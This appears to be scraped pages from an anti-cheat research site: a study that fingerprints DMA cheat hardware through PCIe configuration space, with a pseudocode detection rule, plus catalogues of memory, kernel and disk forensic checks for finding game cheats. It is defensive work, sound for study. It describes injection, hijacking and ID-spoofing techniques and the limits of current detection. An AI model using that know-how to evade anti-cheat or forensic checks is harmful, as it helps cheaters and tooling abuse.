DFIR Detecting ETW Provider Tampering: Patch, Disable, and Spoof https://clubhouseac.shop/research/etw-tampering-detection https://clubhouseac.shop/research/etw-tampering-detection Thu, 05 Mar 2026 00:00:00 GMT Cheat loaders that patch EtwEventWrite to a bare return, disable providers via NtTraceControl, or forge event payloads leave structural traces in the ETW metadata tables and session descriptors. We enumerate four distinct tampering techniques observed in the wild and document the kernel-side consistency checks that detect each one without relying on the event stream itself. Clubhouse AC Research Kernel Forensics ETW Kernel Anti-Telemetry DFIR HWID Spoofer Rotation Detection via SMBIOS + ACPI Cross-Reference https://clubhouseac.shop/research/hwid-rotation-smbios https://clubhouseac.shop/research/hwid-rotation-smbios Sun, 22 Feb 2026 00:00:00 GMT HWID spoofers rotate visible identifiers (MachineGuid, MAC, disk serials) but rarely touch every cross-domain identifier consistently. We correlate SMBIOS Type 1/2/3 fields against ACPI \_UID values, EFI variables, and TPM EK certificates to surface rotation events even when individual identifiers appear clean. Clubhouse AC Research Identity HWID SMBIOS ACPI TPM Process Hollowing Detection via VAD and Section Object Cross-Reference https://clubhouseac.shop/research/process-hollowing-section-detection https://clubhouseac.shop/research/process-hollowing-section-detection Fri, 30 Jan 2026 00:00:00 GMT Classic process hollowing overwrites legitimate image sections with injected code, leaving the VAD (Virtual Address Descriptor) tree claiming a mapped image path that no longer matches the on-disk binary or the in-memory PEB LDR entries. We detail a detection technique that cross-references VAD node ImageFilePointer, the PEB Ldr InMemoryOrderModuleList, and the mapped section object hash to surface hollowed and stomped-image processes with a 1.8% false-positive rate on clean game populations. Clubhouse AC Research Memory Forensics Process Hollowing VAD PEB Memory Forensics Injection --- # DMA Hardware Fingerprinting: PCILeech and Squirrel Detection · Clubhouse AC HardwareHighDisclosure pending DMA hardware fingerprinting PCILeech and Squirrel detection =========================================================== Direct Memory Access cheat hardware — FPGA boards running PCILeech, Squirrel, and CaptainDMA firmware — presents on the PCIe bus with vendor and device identifiers that its operators attempt to clone from legitimate cards. We show that Vendor ID spoofing alone is insufficient: BAR layout, capability-list structure, and configuration-space timing deltas form a composite fingerprint that correctly classifies attack hardware even when the headline IDs are forged. CR Clubhouse AC Research April 4, 2026 12 min read Defensive use only Summary * Catalogued seven commercially-sold DMA boards with distinct PCIe configuration-space signatures. * BAR-layout + capability-list composite probe distinguishes FPGA attack boards from the legitimate cards they impersonate with 96.4% precision. * Full fingerprints for three board families withheld pending vendor disclosure; detection rule ships in Clubhouse AC scanner in sanitised form. Background ---------- PCILeech (Ulf Frisk, 2016) is an open-source framework that reads and writes arbitrary physical memory over DMA — an attack primitive that predates software anti-cheat entirely. Its hardware backends are FPGA boards (Xilinx and Intel Altera families) that speak PCIe to the target machine and USB or Thunderbolt to the attacker-controlled controller machine. Because the read path bypasses the CPU and operating system entirely, no ring-0 driver is required on the target, and no Windows API is called. The game process cannot observe the memory reads. The commercial cheat market adapted this rapidly. By 2023, boards branded “Squirrel” (35T variant), “CaptainDMA” (75T), and several unbranded Aliexpress variants were shipping with pre-loaded PCILeech firmware and cheat-compatible memory-read libraries. The standard counter — checking the PCIe device tree from within the OS — is defeated by copying the Vendor ID and Device ID from a legitimate NIC or capture card. A naive check against Win32\_PnPEntity returns the spoofed identity. Our research documents why Vendor/Device ID spoofing is necessary but not sufficient: the full 256-byte (standard) and 4096-byte (extended) PCIe configuration space contains structural properties that FPGA firmware does not faithfully replicate, and cannot replicate at arbitrary cost without a full hardware re-spin. Threat model ------------ We assume an operator who: * Has physical access to their own machine and has installed a DMA board in a free PCIe slot. The board is connected to a second machine (“attack PC”) running the cheat and read logic. * Has flashed the board's PCIe configuration space (the “device shadow”) to present a cloned Vendor/Device ID from a common peripheral — we observed Realtek NIC (0x10EC/0x8168), ASmedia USB controller (0x1B21/0x1042), and an Elgato capture card (0x1CE4/0x0003) as the most common donor identities. * May have purchased a “custom firmware” service that further tweaks the Subsystem ID and Device Serial Number capability. We account for this class. * Does _not_ have the ability to modify the physical FPGA fabric or introduce real hardware capability registers — only the configuration-space shadow in flash is under software control. PCIe configuration space ------------------------ Every PCIe device exposes a 256-byte (legacy PCI compatible) or 4096-byte (PCIe extended) configuration space. The first 64 bytes are the standard header; beyond offset 0x40, Capability structures form a linked list terminated by a null Next Pointer. Extended capabilities live in the extended space starting at 0x100. The fields an operator can update by reflashing a Xilinx BRAM-based config shadow include: Vendor ID (0x00), Device ID (0x02), Subsystem Vendor ID (0x2C), and Subsystem ID (0x2E). Registers that are either hard-wired in the FPGA IP core or computed dynamically include: * BAR registers (0x10–0x24) — Base Address Registers declare the size and type (MMIO / I/O, 32-bit / 64-bit, prefetchable) of each memory window the device requests. FPGA PCIe IP cores offer a fixed menu of BAR sizes dictated by the synthesis parameters; a Realtek NIC's typical single 256-byte I/O BAR + 64 KB MMIO BAR is trivially distinguishable from the 256 MB MMIO BAR typical of a XDMA-based FPGA core. * Capability list — the chain of capabilities at offsets 0x40+ depends entirely on which PCIe IP features the FPGA RTL instantiates. A genuine Realtek card carries MSI-X, Power Management, and Vital Product Data capabilities at specific offsets; Xilinx XDMA IP instantiates MSI / MSI-X, Power Management, Express, AER, and — critically — Device Serial Number (DSN). DSN is rare on consumer NICs and serves as a high-specificity signal when present on a device claiming to be one. * Link Speed / Width negotiation — observable in the PCIe Express Capability register. A board advertising a Realtek GbE NIC but negotiating PCIe Gen2 x1 with a 5 GT/s link speed is anomalous (GbE NICs are PCI 2.0 / PCIe 1.1 devices). The configuration space is readable from Windows via the SetupDiGetDeviceRegistryProperty / SetupAPI path for some fields, and directly via a kernel-mode driver using IRP\_MN\_READ\_CONFIG or the HAL HalGetBusDataByOffset call. Our scanner uses the latter to read the full 4096-byte extended space. Board fingerprints ------------------ We acquired or received access to seven DMA boards sold commercially as of Q1 2026. For each, we enumerate the distinguishing configuration-space properties: | Board | FPGA | Distinguishing property | Sig. withheld? | | --- | --- | --- | --- | | Screamer M.2 | Artix-7 35T | DSN capability at 0x148; BAR0 = 256 MB prefetchable MMIO | No | | Squirrel (35T) | Artix-7 35T | BAR1 absent in donor NIC present in FPGA; Gen2 x1 on GbE clone | No | | CaptainDMA 75T | Kintex-7 75T | AER ext. capability; three MBARs vs donor single-BAR NIC | No | | ZDMA (PCIe 3.0) | Ultrascale+ ZU3EG | Gen3 x2 link on device claiming Gen1 NIC | No | | Board E (unbranded) | ECP5-25F (Lattice) | Custom IOCTL shadow; ProgIF 0x00 on class 0xFF00 | Partial | | Board F (private) | Artix-7 100T | DSN lower 32 bits always 0x00000001 across all tested units | Yes | | Board G (private) | Artix-7 200T | Reserved config-space bytes 0xE0–0xFF non-zero (firmware artefact) | Yes | The most reliable discriminator across the full seven-board corpus is the BAR layout. Every FPGA PCIe IP core we observed requests at least one 256 MB MMIO BAR for the DMA engine. Consumer peripherals — NICs, USB controllers, audio adapters — use BAR windows of kilobytes to low megabytes. A device advertising itself as a Realtek GbE NIC while requesting a 256 MB prefetchable MMIO region is structurally impossible; the Realtek RTL8168 silicon does not have a DMA engine of that scale. Detection rule -------------- The production detection in the Clubhouse AC scanner runs from a privileged kernel mini-driver that performs a full configuration-space read for every enumerated PCIe device. The pseudocode below reflects the published (non-operational) form of the composite rule: rules/dma\_pcie\_fingerprint.rulePseudocode rule DMA\_FPGA\_Fingerprint { meta: severity = "high" category = "hardware" confidence = 0.96 inputs: for each device in pcie\_device\_tree(): cfg := read\_config\_space(device, 0x000, 4096) vid := cfg\[0x00:0x02\] // Vendor ID did := cfg\[0x02:0x04\] // Device ID class := cfg\[0x0A:0x0C\] // Class / Subclass bars := parse\_bars(cfg) caps := parse\_capability\_list(cfg) ext := parse\_extended\_caps(cfg, 0x100) match: // Signal A: BAR size mismatch against known device profile any bar in bars where bar.is\_mmio and bar.size\_mb > 64 and (vid, did) in LOW\_BAR\_DEVICE\_SET // donor device should not need >64 MB MMIO // Signal B: Device Serial Number capability present on // a device class that never ships DSN hardware or (DSN\_CAP\_ID in ext.cap\_ids and class in CONSUMER\_NIC\_OR\_USB\_CLASSES) // Signal C: PCIe Link Speed / Width inconsistency or (express\_cap := caps\[PCI\_CAP\_EXPRESS\]; express\_cap.current\_link\_speed > donor\_max\_speed(vid, did)) // Signal D: Reserved config-space bytes non-zero // (FPGA firmware artefact — real silicon leaves these 0xFF or 0x00) or any b in cfg\[0xE0:0x100\] where b != 0x00 and b != 0xFF emit: artifact { device\_path = device.path vid\_did = (vid, did) spoofed\_as = lookup\_donor(vid, did) signals\_fired = matched\_signals bar\_layout = bars dsn\_present = (DSN\_CAP\_ID in ext.cap\_ids) link\_speed\_gts = express\_cap.current\_link\_speed } } Signal A (BAR size) has the lowest false-positive rate because it is a structural property of the silicon. Signal D (reserved bytes) is the most fragile — firmware updates can zero-fill the shadow, and we have seen one board revision that did exactly this. The production rule requires at least two independent signals before emitting a detection at High confidence; a single signal emits at Medium. Validation ---------- 7 DMA board families fingerprinted 96.4% Precision (true positive rate) 214 Scans with known-clean hardware baseline 8 False positives — all IOMMU passthrough VMs All eight false positives came from virtualised environments where a PCIe device was passed through to a guest VM via IOMMU. The hypervisor's PCIe virtualisation layer introduces BAR size rounding and occasional DSN capability insertion that mimics our Signal A and Signal B patterns. The production rule suppresses these via a VM-presence heuristic (Hyper-V CPUID leaf, VMware I/O port, QEMU ACPI table strings) and has not produced a false positive on bare-metal hardware in 214 clean-baseline scans. Limitations ----------- * A sufficiently sophisticated firmware author could synthesise a clean PCIe IP core with a BAR layout that exactly matches the donor device. This requires RTL engineering skill and a targeted FPGA re-spin — it is not achievable through config-space shadow manipulation alone. We have not observed this in the commercial market as of this writing. * IOMMU passthrough VMs remain a source of false positives without the VM-presence suppression layer. Server-grade FiveM rented boxes often run under KVM with PCI passthrough for GPU; administrators running our scanner in those environments should expect Medium-confidence alerts that manual triage will clear. * Detection requires kernel-level PCIe config-space access — a privilege level that implies the scanner is already running on the target machine. This methodology does not help with remote-attestation scenarios (detecting DMA hardware from the game server). * We have tested against seven boards. The space of privately-commissioned FPGA firmware is larger than our sample. New board families will require new signature additions; the composite rule provides coverage through structural properties that are hard to spoof even without a named signature. Disclosure ---------- 2026-01-08Board acquisition complete; fingerprint corpus closed for seven families. 2026-01-22Detection rule validated internally against clean-baseline corpus. 2026-02-10Contacted maintainers of PCILeech open-source project with findings on Boards A–D (public hardware). No response required — no vulnerability in PCILeech itself; findings are defensive detection. 2026-03-01Reached out to two commercial vendors (Boards F and G) with full configuration-space dumps. Awaiting response. 2026-04-04Sanitised detection rule deployed to Clubhouse AC production scanners. Full fingerprints for Boards F and G withheld pending vendor response. Defensive material — partial disclosure Full configuration-space dumps for Boards F and G are withheld pending vendor response. The detection rule ships in sanitised form in the Clubhouse AC scanner. DFIR teams and anti-cheat vendors seeking the full corpus can reach the team at security@clubhouseac.shop. Related research Continue reading ---------------- [Identity\ \ ### HWID Spoofer Rotation Detection via SMBIOS + ACPI Cross-Reference\ \ SMBIOS, ACPI \_UID values, EFI variables, and TPM EK certificates preserve a system identity that HWID spoofers rarely touch consistently.\ \ Read research](https://clubhouseac.shop/research/hwid-rotation-smbios) [Kernel forensics\ \ ### Detecting BYOVD chains through kernel callback forensics\ \ Reconstructing driver load order and callback unregistration from USN journal and registry transaction logs after binary deletion.\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain) --- # Tier 3 — Elite Forensic PC Checking · Clubhouse AC Tier 3Memory + kernel · 1–3 hrs · 48 methods Elite Forensic PC Checking ========================== Tier 3 is where memory wins arguments disk loses. RAM contains every running process, loaded DLL, network connection, and PowerShell command in flight. Capturing memory and analysing it offline reveals what's happening RIGHT NOW that would never appear on disk — including kernel-level cheats, fileless payloads, injected code, and DMA hardware history. All48Tier 3 Tool Downloads5Memory Forensics12Kernel & Drivers5Fileless & Scripts2Persistence Deep5Registry Deep Forensics2SQLite & Database Carving1Event Log Tampering1Hash / Signature / PE Analysis3Cloud / Sync1Time Manipulation & SSD2Full Timeline & Verdict9 T3 Tier 3 Tool Downloads --------------------- 5 ### Volatility 3 — Memory Forensics The world's most widely used memory forensics framework. Auto-detects OS, downloads symbols automatically. 3 tools ### Memory Acquisition Tools RAM capture utilities produce a raw memory image from a live Windows system for offline analysis. You run one of these tools on the suspect machine before analysis, writing the dump to an external drive; the resulting file is then fed into Volatility or similar frameworks. Choosing the right tool matters: some require elevated privileges, some have driver compatibility issues, and some are detectable by anti-cheat. 4 tools ### YARA + Rule Repositories Pattern-matching tool for malware research and cheat detection. Combine with curated rule sets. 6 tools ### PE Analysis Suite Tools for inspecting PE binaries — packers, entropy, imports, sections. 4 tools ### Detection Tools APT scanners bundle curated YARA and Sigma rule sets to automatically flag known-bad indicators across an entire drive or directory. In a PC check context, running one of these tools early can surface known cheat signatures, loader patterns, or post-exploitation tooling before you dive into manual analysis. They complement manual review but do not replace it — cheats with novel obfuscation will evade them. 2 tools T3 Memory Forensics ---------------- 12 ### Live Memory Dump Analysis RAM contains everything currently running — every process, every loaded DLL, every network connection, every command typed in PowerShell. Capturing memory and analyzing it offline reveals what's happening RIGHT NOW that would never appear on disk. 2 tools1 command ### Kernel Memory Dump Analysis Kernel memory contains every loaded driver, kernel callback, and SSDT/IRP hook. Kernel-level cheats live here. Capturing kernel memory is the only way to see what's running underneath the OS. 1 tool3 locations1 command ### Volatility Core Plugin Reference Reference card for Volatility 3 plugins covering system info, processes, code injection, modules/DLLs, network, registry, and dumping. 2 tools ### Process Hollowing Confirmation A hollowed process has a mismatch between the on-disk image and what's in memory. Compare disk image bytes vs memory image bytes — if hashes differ, the process was hollowed. 3 tools1 command ### Reflective DLL Injection Confirmation Reflective DLL injection loads a DLL into a process WITHOUT using LoadLibrary. The DLL is never registered in the PEB loader chain, so it doesn't appear in normal DLL lists. It's a flagship cheat injection technique. 3 tools1 command ### Manual Mapped Module Detection Manual mapping is when an injector parses a PE file itself, allocates memory, fixes imports/relocations, and jumps to the entry point — bypassing all standard Windows loader notifications. The DLL is in memory but not in any module list. 3 tools1 command ### Thread Start-Address Analysis Every thread starts at a specific address. Legitimate threads start inside a known module. Threads created by injection often start at addresses outside any loaded module — a strong injection indicator. 3 tools1 command ### RWX / Private Executable Memory RWX memory (Read + Write + Execute) is almost never legitimate. Modern compilers don't generate RWX pages — they're a hallmark of shellcode, packers, JIT abuse, or self-modifying cheat code. Private executable memory (executable but not backed by a file) is similarly suspicious. 4 tools1 command ### Game Process Module Baseline Comparison Maintain a baseline of every DLL a clean game process should load. Compare the suspect's loaded modules against this baseline. Anything extra is potentially a cheat. 3 tools1 command ### FiveM / GTA Process Memory Strings Even if a cheat is encrypted on disk, it must decrypt itself in memory to function. Strings extracted from the live game process can reveal cheat menus, debug strings, function names, URLs, and Discord webhooks. 3 tools1 command ### System Process Memory Correlation Even if disk artifacts are wiped (CCleaner, Prefetch deletion, BAM cleared), the SYSTEM PROCESSES still hold recent activity in memory. Dumping these processes recovers what was wiped. Targets: csrss.exe, PcaSvc, DPS, services.exe, svchost.exe. 2 tools1 command ### PowerShell / CMD / Java Memory Recovery Even if ConsoleHost\_history.txt is deleted, command strings often remain in the powershell.exe / cmd.exe process memory. Java process memory holds .class definitions and runtime arguments. 3 tools1 command T3 Kernel & Drivers ---------------- 5 ### Driver Object Analysis Every loaded driver creates a DRIVER\_OBJECT in kernel memory. Each object has IRP handlers, a name, a driver image, and registered callbacks. Cheats often create driver objects with random names, fake names mimicking legit drivers, or no associated file. 2 tools1 command5 bypass ### Unsigned Kernel Driver Review On modern Windows (Vista+ x64), all kernel drivers must be signed. Unsigned drivers can only load if Test Signing is enabled, DSE is bypassed, or a signed-but-vulnerable driver is exploited (BYOVD). 3 tools1 command ### Vulnerable Driver Abuse Detection (BYOVD) 'Bring Your Own Vulnerable Driver' is when a cheat exploits a legitimate-but-vulnerable signed driver to gain kernel access without needing to sign their own driver. Microsoft maintains a list of known-bad drivers. 3 tools1 command ### DMA / PCI / Thunderbolt Device History External DMA cheats use PCIe/Thunderbolt cards (Squirrel, ScreamerM2, etc.) to read game memory directly without any software running on the target machine. The target system records every PCIe device that's ever been connected. 2 tools4 locations1 command7 bypass ### Kernel-PnP Event ID Correlation The Microsoft-Windows-Kernel-PnP log records every device plug/unplug event. Cross-referenced with timestamps, this shows EXACTLY when DMA hardware was connected — even if the user disconnected it before the SS. 1 tool2 locations1 command T3 Fileless & Scripts ------------------ 2 ### Fileless Execution Investigation Fileless cheats run entirely in memory — no .exe on disk, no Prefetch, no AmCache. They're delivered through PowerShell, WMI, registry payloads, or in-memory injection. 3 tools ### Script Block Reconstruction & Encoded Correlation Even with obfuscation, PowerShell logs the original deobfuscated script via Script Block Logging (Event ID 4104). Reconstruct multi-block scripts and decode encoded payloads. 3 tools1 command T3 Persistence Deep ---------------- 5 ### WMI Permanent Event Subscription WMI permanent event subscriptions trigger code execution on system events (boot, login, timer, process creation). Invisible to Task Scheduler, Autoruns shows them but most users never check. 2 tools1 location1 command4 bypass ### COM Hijack Deep Registry Review COM hijacking redirects legitimate COM objects to malicious DLLs by adding entries in HKCU that override HKLM. When any program loads the COM object, it loads the cheat instead. 2 tools3 locations1 command ### DLL Search-Order Hijack Windows searches for DLLs in a specific order. Placing a malicious DLL with the same name as a legitimate one earlier in the search path causes the malicious one to load. Game directories with side-loadable DLLs are frequent targets. 2 tools1 command ### KnownDLLs / AppInit\_DLLs Review KnownDLLs are pre-loaded DLLs available to all processes. Adding a malicious entry = injection into every process. AppInit\_DLLs (legacy but still abused) loads into every GUI process via user32.dll. 2 tools2 locations1 command ### IFEO Debugger Hijack Image File Execution Options (IFEO) lets developers attach a debugger to a process. Cheats abuse this — IFEO key sets 'Debugger' value to point at a cheat .exe, so every time the target program runs, the cheat runs instead. 2 tools1 location1 command T3 Registry Deep Forensics ----------------------- 2 ### Registry Transaction Log Analysis Every registry hive has .LOG1 and .LOG2 transaction files. These contain pending registry changes that haven't been flushed yet — including changes that were rolled back. They reveal short-lived registry modifications. 3 tools4 locations ### Deleted Registry Key Recovery / Hive Slack When registry keys are deleted, the data is marked free but often remains in hive slack space until overwritten. Dedicated parsers can recover deleted keys, values, and timestamps. 3 tools T3 SQLite & Database Carving ------------------------- 1 ### SQLite Database Slack Recovery SQLite databases (browser history, ActivitiesCache.db, Discord cache, etc.) don't truly delete records — they mark cells free. Forensic SQLite tools recover deleted rows from page slack and freelists. 4 tools T3 Event Log Tampering ------------------- 1 ### EVTX Tamper / Gap / Sequence Anomaly Review Every event has an EventRecordID — a strictly sequential number. Gaps in the sequence, mismatched timestamps, or inconsistent record counts indicate tampering, manual deletion, or selective wiping. 3 tools1 command3 bypass T3 Hash / Signature / PE Analysis ------------------------------ 3 ### Suspicious Certificate / Fake Signature Some cheats use stolen, expired, or self-issued certificates to appear 'signed'. Authenticode signatures can also be malformed or manipulated to bypass quick checks. 2 tools1 command4 bypass ### Static PE Header / Packer / Entropy / Imports Inspect PE binaries for header anomalies (packer section names, high entropy, mismatched virtual/raw sizes, unusual permissions, missing debug info, suspicious timestamps) and import table anomalies (very few imports, dynamic resolution, crypto APIs, injection APIs). 5 tools ### YARA Scanning for Cheat Traits YARA scans files (and memory) for byte/string patterns. Combine community rule sets with custom rules for known FiveM/GTA cheats to detect them even when packed or renamed. 8 tools1 command T3 Cloud / Sync ------------ 1 ### Cloud Sync Artifact Review Cheats are often distributed via cloud storage. Even after files are removed, sync clients leave detailed logs of every file downloaded/synced. 2 tools6 locations T3 Time Manipulation & SSD ----------------------- 2 ### Time Change / Clock Rollback Some bypasses involve rolling back the system clock to make recent activity appear older, or to invalidate license-checked cheats. The Windows Time Service logs every clock change with EventID 4616. 2 tools1 command ### TRIM / SSD Limitation Assessment SSDs use TRIM to immediately erase deleted data for performance. This means file recovery on SSDs is far less reliable than on HDDs. Document this limitation in any check that depends on disk-level recovery. 1 command T3 Full Timeline & Verdict ----------------------- 9 ### Full Forensic Timeline Reconstruction The T3 Mega Timeline. Build a single timeline from ALL artifact sources and correlate everything. Five steps: collect with KAPE, run Hayabusa for events, run Volatility if RAM captured, load every CSV into Timeline Explorer, build the event chain. 5 tools1 command ### Artifact Contradiction Analysis The truth shows up in CONTRADICTIONS. When one artifact says X happened but another says it didn't, the contradiction itself is evidence. ### False-Positive Elimination Workflow ONE indicator is not proof. Always rule out legitimate explanations before calling something a cheat. Common false positives: unsigned DLLs in Steam/Battle.net/Epic, RWX memory in browsers (V8/JIT), legitimate game mods, MSI Afterburner / RTSS / Discord overlay, AntiVirus injection, old Prefetch entries, empty PowerShell history on a fresh user. ### Evidence Chain Documentation Standard template for case documentation: case ID, finding (verdict + confidence), evidence per artifact source, correlation, false-positive elimination, timeline, tools used, auto-fail triggers, staff notes, attachments. ### Final Confidence Scoring Matrix Each indicator scores points. Sum determines verdict. High value (50+ pts), Medium value (20–40 pts), Low value (5–20 pts). Thresholds: 0–19 PASS · 20–39 FLAGGED · 40–69 HIGH SUSPICION · 70+ CONFIRMED · ANY auto-fail = instant fail. ### Game-Session Focused Timeline Workflow: identify session window, scope Timeline Explorer to that window (game start -10min to end +10min), filter by user SID, stack artifacts by time, flag anything that started right before launch / created files in temp during session / made non-game network connections / was deleted right after. 1 tool ### Boot / Session / Logon Timeline Key event IDs for boot/shutdown and logon timeline reconstruction. Used to identify rapid boot/shutdown cycles, RDP logons during expected solo gameplay, service-type logons running unexpected programs. 3 tools ### Cross-Drive / Multi-User Comparison Multi-Drive: cheats may live on a secondary drive 'always disconnected during checks'. Multi-User: cheats may be installed under a different user account. Compare MountedDevices, ShellBags, LNK volume serials, USN per-volume; check NTUSER.DAT/UsrClass.dat across all profiles, BAM/DAM per-SID for ALL user SIDs. 1 tool1 command ### Senior Staff Playbook The ultimate SS flow: PHASE 1 T1 Quick Triage (5–10 min, auto-fail = end), PHASE 2 T2 Deep Dive (30–60 min, KAPE + parsers + Hayabusa + Timeline Explorer), PHASE 3 T3 Forensic (1–3 hrs, RAM capture + Volatility + PE-Sieve + ProcDump + YARA), FINAL Document with Evidence Chain template + Confidence Matrix + verdict. The Golden Rule — Tier 3 Memory doesn't lie. Disk can be wiped. Logs can be cleared. Files can be deleted. But while the system is running, the truth is in RAM. Capture it. Parse it. Cross-reference it against every disk artifact. If memory says one thing and disk says another — believe memory. If a process is running but has no file on disk — that's the cheat. If a DLL is loaded but not in any module list — that's the injection. If a thread starts outside any module — that's the payload. [Previous\ \ Tier 2 · Advanced](https://clubhouseac.shop/research/pc-checking-methods/tier-2) [Next\ \ Tier 4 · Full acquisition](https://clubhouseac.shop/research/pc-checking-methods/tier-4) --- # Tier 4 — Full Forensic Acquisition & Reconstruction · Clubhouse AC Tier 4Court-grade DFIR · 4–24 hrs · 32 methods Full Forensic Acquisition & Reconstruction ========================================== Tier 4 is professional-grade DFIR. What corporate forensic examiners and law enforcement do. Each check can take hours to days. Reserved for high-stakes cases — appeals, league finals, ban-evasion suspects with prior strikes. Every byte preserved, every hash verified, every step documented, every conclusion peer-reviewed. All32Tier 4 Tool Downloads8Acquisition & Chain of Custody5Professional Forensic Suites2SuperTimeline2File Carving & Recovery2Deep NTFS Reconstruction1Registry Recovery1Deception & Anti-Forensics2Static Malware Analysis2Full T4 Case Workflow7 T4 Tier 4 Tool Downloads --------------------- 8 ### Disk Imaging / Acquisition Industry-standard tools for creating verified forensic disk and memory images. Used at the very start of any T4 investigation to capture a bit-for-bit copy of the target drive before any analysis begins. The integrity of every downstream finding depends on the quality of this acquisition step. 4 tools ### SuperTimeline Framework The gold standard for super timeline generation. Plaso parses 100+ artifact types into one timeline. 4 tools ### Full Forensic Suites Comprehensive all-in-one forensic analysis platforms that combine acquisition, file system parsing, keyword search, timeline analysis, and reporting into a single case-managed interface. Reach for these when you need a structured, auditable workflow from raw disk image to final report with the least tool-switching overhead. 4 tools ### Memory Forensics Tools for analyzing captured RAM dumps to expose processes, injected code, network connections, and kernel-level cheats that exist only in memory and vanish on reboot. Memory forensics is often the only way to prove a cheat was actively running at game time — disk artifacts alone cannot confirm execution context. 4 tools ### File Carving Tools that scan raw disk bytes for file headers and footers to reconstruct files deleted from the filesystem — even when directory entries are gone. Cheaters who delete their cheat EXEs and DLLs often leave recoverable copies in unallocated space, and file carving is the primary method to get them back for analysis. 5 tools ### Hashing / Chain of Custody Tools for computing and verifying cryptographic hashes across every stage of evidence handling. Hashing is the backbone of chain-of-custody integrity — it proves that a disk image or file has not been altered between acquisition, analysis, and reporting. Without matching hashes, findings can be challenged or excluded in any appeals process. 3 tools ### SQLite Forensics Tools for recovering deleted records and free-page data from SQLite databases, which store nearly all chat, browser, and gaming application history. Many cheating platforms and communication apps (Discord, Slack, Teams, browsers) keep their logs in SQLite files, and even after a user deletes messages or clears history, unvacuumed database pages often retain the original content. 3 tools ### Debuggers / Disassemblers Tools for statically disassembling and dynamically debugging suspected cheat binaries and kernel drivers. When a file is flagged by YARA or PE analysis, these tools let you read its actual logic — confirming it injects into game processes, hooks API calls, or manipulates kernel memory — turning a suspicious hash into a documented cheat capability. 3 tools T4 Acquisition & Chain of Custody ------------------------------ 5 ### Full Disk Image Acquisition A full disk image is an exact bit-for-bit copy of the entire drive. This includes ALL allocated files, deleted files, slack space, unallocated space, partition tables, and boot records. Once captured, you can run any forensic tool against it without altering the original. 1 tool ### RAM + Disk Evidence Preservation Capture in order of volatility — most volatile first: CPU registers, RAM, network connections, running processes, open files, hard disk, external media. 3 tools ### Write-Blocked Evidence Handling Just plugging a drive into Windows can modify metadata — last access times, search index, prefetch entries. To preserve evidence integrity, use a write blocker (hardware or software). 3 tools1 command ### Chain-of-Custody Documentation Chain of custody is the documented timeline of who handled evidence, when, and why. Without it, evidence can be challenged on appeal. Every staff member who touches the data must sign in. ### Forensic Hash Verification Always compute BOTH MD5 and SHA1 (or SHA256). MD5 is fast and well-known but has known collisions. SHA1 is slower but stronger. Two hashes guarantee evidence integrity in court. 3 tools1 command T4 Professional Forensic Suites ---------------------------- 2 ### Autopsy Full Tutorial Autopsy is the leading free, open-source digital forensics platform. Built on The Sleuth Kit, it provides file system analysis, timeline analysis, keyword search, web artifact extraction, registry analysis, hash filtering, email parsing, EXIF extraction, and a plug-in architecture. 1 tool ### KAPE Full Tutorial KAPE (Kroll Artifact Parser and Extractor) is a triage tool that collects forensic artifacts from a live system or image, parses them with EZ Tools and other modules, and outputs CSVs ready for Timeline Explorer. 1 tool1 command T4 SuperTimeline ------------- 2 ### Plaso / log2timeline SuperTimeline Plaso parses 100+ artifact types from a disk image and aggregates them into a single chronological timeline. THE gold standard for forensic timeline reconstruction. 2 tools1 command ### Timesketch Timeline UI Timesketch is Google's open-source web-based timeline analysis platform. It imports Plaso output and provides multi-user collaboration, tagging/annotation, saved searches, Sigma rule-based detection, and timeline graphing. 1 tool1 command T4 File Carving & Recovery ----------------------- 2 ### File Carving from Unallocated Space File carving searches raw disk bytes for file headers and footers, reconstructing files even when filesystem metadata is gone. The classic 'deleted but not overwritten' recovery. 4 tools1 command ### Partial PE Recovery from Deleted Data Even partial PE files (with header but truncated body) can be useful — the PE header alone reveals compilation timestamp, imports, sections, and original filename via debug strings. 4 tools T4 Deep NTFS Reconstruction ------------------------ 1 ### NTFS Transaction-Level Reconstruction Three NTFS forensic sources: $MFT (every file/folder ever created — deleted records remain until reused), $UsnJrnl:$J (every file operation), $LogFile (NTFS transaction log — operations not yet in $MFT). 3 tools1 command T4 Registry Recovery ----------------- 1 ### Registry Hive Slack Carving Registry hives don't truly delete keys — they mark them free. Slack space within hives often contains recently deleted Run keys, deleted UserAssist entries, old MUICache values, deleted COM hijack entries. 3 tools1 command T4 Deception & Anti-Forensics -------------------------- 2 ### Anti-Forensic Tool Detection Cleaner usage IS the evidence. If CCleaner ran and Prefetch is also clean — that's contradiction. Cleaner shouldn't have wiped its OWN execution record. Means a second cleaner or manual deletion came after. 1 command ### Secure Deletion Residue Analysis SDelete creates files named 'AAAAAAAA...' then renames before deletion — look for files with all-A or all-zero names in $UsnJrnl. Cipher /w creates EFSTMPWP folder during operation and writes patterns to free space. Eraser logs to %APPDATA%\\Eraser, configuration in NTUSER.DAT, has service entries. T4 Static Malware Analysis ----------------------- 2 ### Static PE Header Analysis Four-step workflow: Quick triage with PEStudio (auto-flags suspicious imports, anomalous sections, empty version info, VT score, entropy, resource anomalies), packer detection with DiE (compiler, packer, entropy graph, section permissions), deep inspection with PE-bear (DOS/NT headers, sections, imports, exports, resources, debug, Authenticode), certificate validation with sigcheck. 4 tools5 bypass ### YARA against Memory + Custom Rules Scan memory dumps and process dumps with YARA. Write custom rules for cheat menu strings (FiveM cheat menus, redENGINE, Eulen, Susano, Skript.gg). 7 tools1 command T4 Full T4 Case Workflow --------------------- 7 ### Full Case Workflow (The Master SOP) 10-phase workflow: Case Opening (5 min) → Acquisition (30–120 min) → Verification (10 min) → Triage Parsing (30–60 min) → SuperTimeline (2–8 hrs) → Deep Dive → Contradiction Analysis → False-Positive Elimination → Reporting (30–90 min) → Case Closing. ### Final Evidence Report Template Standard forensic examination report template covering: case header, executive summary, evidence inventory, chain of custody, methodology (tools used + versions), findings table with scores, timeline, contradictions identified, false positives eliminated, total confidence score, threshold met, conclusion, appendices, examiner signatures. ### External DMA Forensic Reconstruction DMA cheats use a SECOND PC + a PCIe card (Squirrel, ScreamerM2, LeetDMA, FPGA boards) to read game memory directly. The target machine never has cheat software running — but every PCIe device EVER connected leaves traces in setupapi logs, registry, and kernel-PnP events. Most expensive cheat method (~$300–1500), beats every memory scanner. Catching it means catching the HARDWARE history. 3 tools5 bypass ### KMBox / MAKCM / Input Emulation Detection KMBox (Net, B+, Pro), MAKCM, and similar devices are USB hardware that emulate a mouse + keyboard but receive commands over the network from a second PC. Combined with DMA, this is 'true zero-software' cheating — the cheat happens entirely on a second machine. Detection requires looking at USB device fingerprints because the input device IS the cheat. 4 